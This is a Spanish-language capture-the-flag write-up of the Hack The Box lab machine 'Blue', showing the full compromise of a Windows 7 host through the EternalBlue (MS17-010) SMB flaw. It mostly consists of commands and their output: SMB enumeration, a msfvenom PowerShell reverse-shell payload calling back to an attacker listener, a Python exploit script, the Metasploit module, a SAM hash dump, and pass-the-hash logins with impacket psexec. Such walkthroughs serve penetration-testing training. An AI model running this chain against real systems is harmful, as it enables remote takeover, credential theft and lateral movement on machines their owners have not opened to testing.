Enumeración
Iniciamos la máquina escaneando los puertos de la máquina con nmap, aunque realmente no hay muchos puertos abiertos más que smb y rcp
❯ nmap 10.10.10.40
Nmap scan report for 10.10.10.40
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Con crackmapexec a nivel de smb podemos ver que nos detecta que esta corriendo un Windows 7 Service Pack 1 X64 además que esta corriendo un SMBv1 sin firmar
❯ crackmapexec smb 10.10.10.40
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
Tenemos un Windows 7 con SMBv1 y la máquina se llama Blue, podemos probar con un script de nmap si es vulnerable al Eternal Blue
❯ nmap -p 445 --script smb-vuln-ms17-010 10.10.10.40
Nmap scan report for 10.10.10.40
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
EternalBlue - Python
Si quisieramos explotarlo sin usar metasploit apoyandonos de un script en python podemos usar el repo de github, al usar el checker nos dice que no tiene acceso
❯ python2 checker.py 10.10.10.40
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
Por defecto el script no usa nada como usuario y contraseña, al listar los recursos smb con crackmapexec de esta forma nos devuelve STATUS_ACCESS_DENIED
❯ crackmapexec smb 10.10.10.40 -u '' -p '' --shares
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
SMB 10.10.10.40 445 HARIS-PC [+] haris-PC\:
SMB 10.10.10.40 445 HARIS-PC [-] Error enumerating shares: STATUS_ACCESS_DENIED
Sin embargo al usar como usuario null y no proporcionar contraseña no devuelve ningun error y nos muestra los recursos compartidos existentes en la maquina
❯ crackmapexec smb 10.10.10.40 -u null -p '' --shares
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
SMB 10.10.10.40 445 HARIS-PC [+] haris-PC\null:
SMB 10.10.10.40 445 HARIS-PC [+] Enumerated shares
SMB 10.10.10.40 445 HARIS-PC Share Permissions Remark
SMB 10.10.10.40 445 HARIS-PC ----- ----------- ------
SMB 10.10.10.40 445 HARIS-PC ADMIN$ Remote Admin
SMB 10.10.10.40 445 HARIS-PC C$ Default share
SMB 10.10.10.40 445 HARIS-PC IPC$ Remote IPC
SMB 10.10.10.40 445 HARIS-PC Share READ
SMB 10.10.10.40 445 HARIS-PC Users READ
Basta con modificar el script cambiando el USERNAME por null y correrlo de nuevo
Al correrlo esta vez funciona y despues de probar con varios pipes este nos devuelve OK (64 bit) en 2 de ellos que son los que podemos usar samr y lsarpc
❯ python2 checker.py 10.10.10.40
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
browser: STATUS_OBJECT_NAME_NOT_FOUND
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
samr: Ok (64 bit)
lsarpc: Ok (64 bit)
Es vulnerable asi que para explotarlo iniciaremos creando un archivo exe malicioso con msfvenom el cual nos enviara una powershell cuando este se ejecute
❯ msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1877 bytes
Final size of exe file: 8192 bytes
Saved as: shell.exe
Modificamos el script cambiando el usuario a null y lo ejecutamos pasandole lo siguiente como argumentos ip de la maquina, exe malicioso, puerto, pipe
❯ python2 send_and_execute.py 10.10.10.40 shell.exe 445 samr
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8001ebfba0
SESSION: 0xfffff8a001b2f6e0
FLINK: 0xfffff8a0005b4088
InParam: 0xfffff8a00053e15c
MID: 0x4007
unexpected alignment, diff: 0x75088
leak failed... try again
CONNECTION: 0xfffffa8001ebfba0
SESSION: 0xfffff8a001b2f6e0
FLINK: 0xfffff8a0005c0088
InParam: 0xfffff8a0005ba15c
MID: 0x4103
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Sending file 14Z5CV.exe...
Opening SVCManager on 10.10.10.40.....
Creating service ljTi.....
Starting service ljTi.....
The NETBIOS connection with the remote host timed out.
Removing service ljTi.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done
Despues de ejecutar el exploit el exe se ejecutara y nos enviara una powershell como el usuario nt authority\system con maximos privilegios en el equipo
❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.10.40
Windows PowerShell running as user HARIS-PC$ on HARIS-PC
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>
EternalBlue - Metasploit
Es vulnerable, en este caso lo explotaremos con metasploit, ejecutamos msfconsole y definimos el exploit que queremos utilizar, en este caso el ms17-010 (EternalBlue)
❯ sudo msfconsole -q
[msf](Jobs:0 Agents:0) >> use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>
Seteamos en rhosts la dirección ip de la máquina victima y como lhost la interfaz tun0
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set rhosts 10.10.10.40
rhosts => 10.10.10.40
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> set lhost tun0
lhost => tun0
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >>
Al correrlo conseguimos una sesión de meterpreter nt authority\system directamente, que es el usuario con maximos privilegios en los equipos Windows
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_eternalblue) >> run
[*] Started reverse TCP handler on 10.10.14.10:4444
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 10.10.10.40
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (10.10.14.10:4444 -> 10.10.10.40:49158) at 2023-02-09 19:18:56 -0600
(Meterpreter 1)(C:\Windows\system32) > getuid
Server username: NT AUTHORITY\SYSTEM
(Meterpreter 1)(C:\Windows\system32) >
Con el comando shell en meterpreter obtenemos una cmd, en C:\Users podemos ver solo 2 usuarios, en el Desktop estan ambas flags y tenemos privilegios para leerlas
(Meterpreter 1)(C:\Windows\system32) > shell
Process 2852 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd C:\Users
C:\Users> dir
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of C:\Users
21/07/2017 06:56 <DIR> .
21/07/2017 06:56 <DIR> ..
21/07/2017 06:56 <DIR> Administrator
14/07/2017 13:45 <DIR> haris
12/04/2011 07:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 2,429,788,160 bytes free
C:\Users> type C:\Users\haris\Desktop\user.txt
059**************************681
C:\Users> type C:\Users\Administrator\Desktop\root.txt
399**************************deb
C:\Users>
Podemos usar la función de meterpreter para dumpear la sam y ver los hashes
(Meterpreter 1)(C:\Windows\system32) > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cdf51b162460b7d5bc898f493751a0cc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
haris:1000:aad3b435b51404eeaad3b435b51404ee:8002bc89de91f6b52d518bde69202dc6:::
(Meterpreter 1)(C:\Windows\system32) >
Comprobamos el hash NT de Administrator con crackmapexec y devuelve Pwn3d!
❯ crackmapexec smb 10.10.10.40 -u Administrator -H cdf51b162460b7d5bc898f493751a0cc
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
SMB 10.10.10.40 445 HARIS-PC [+] haris-PC\Administrator:cdf51b162460b7d5bc898f493751a0cc (Pwn3d!)
Usando psexec o wmiexec de impacket podemos conectarnos haciendo un passthehash y obtener una cmd como el usuario nt authority\system
❯ impacket-psexec WORKGROUP/Administrator@10.10.10.40 -hashes :cdf51b162460b7d5bc898f493751a0cc
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.10.40.....
[*] Found writable share ADMIN$
[*] Uploading file zqdeRFGe.exe
[*] Opening SVCManager on 10.10.10.40.....
[*] Creating service BawI on 10.10.10.40.....
[*] Starting service BawI.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
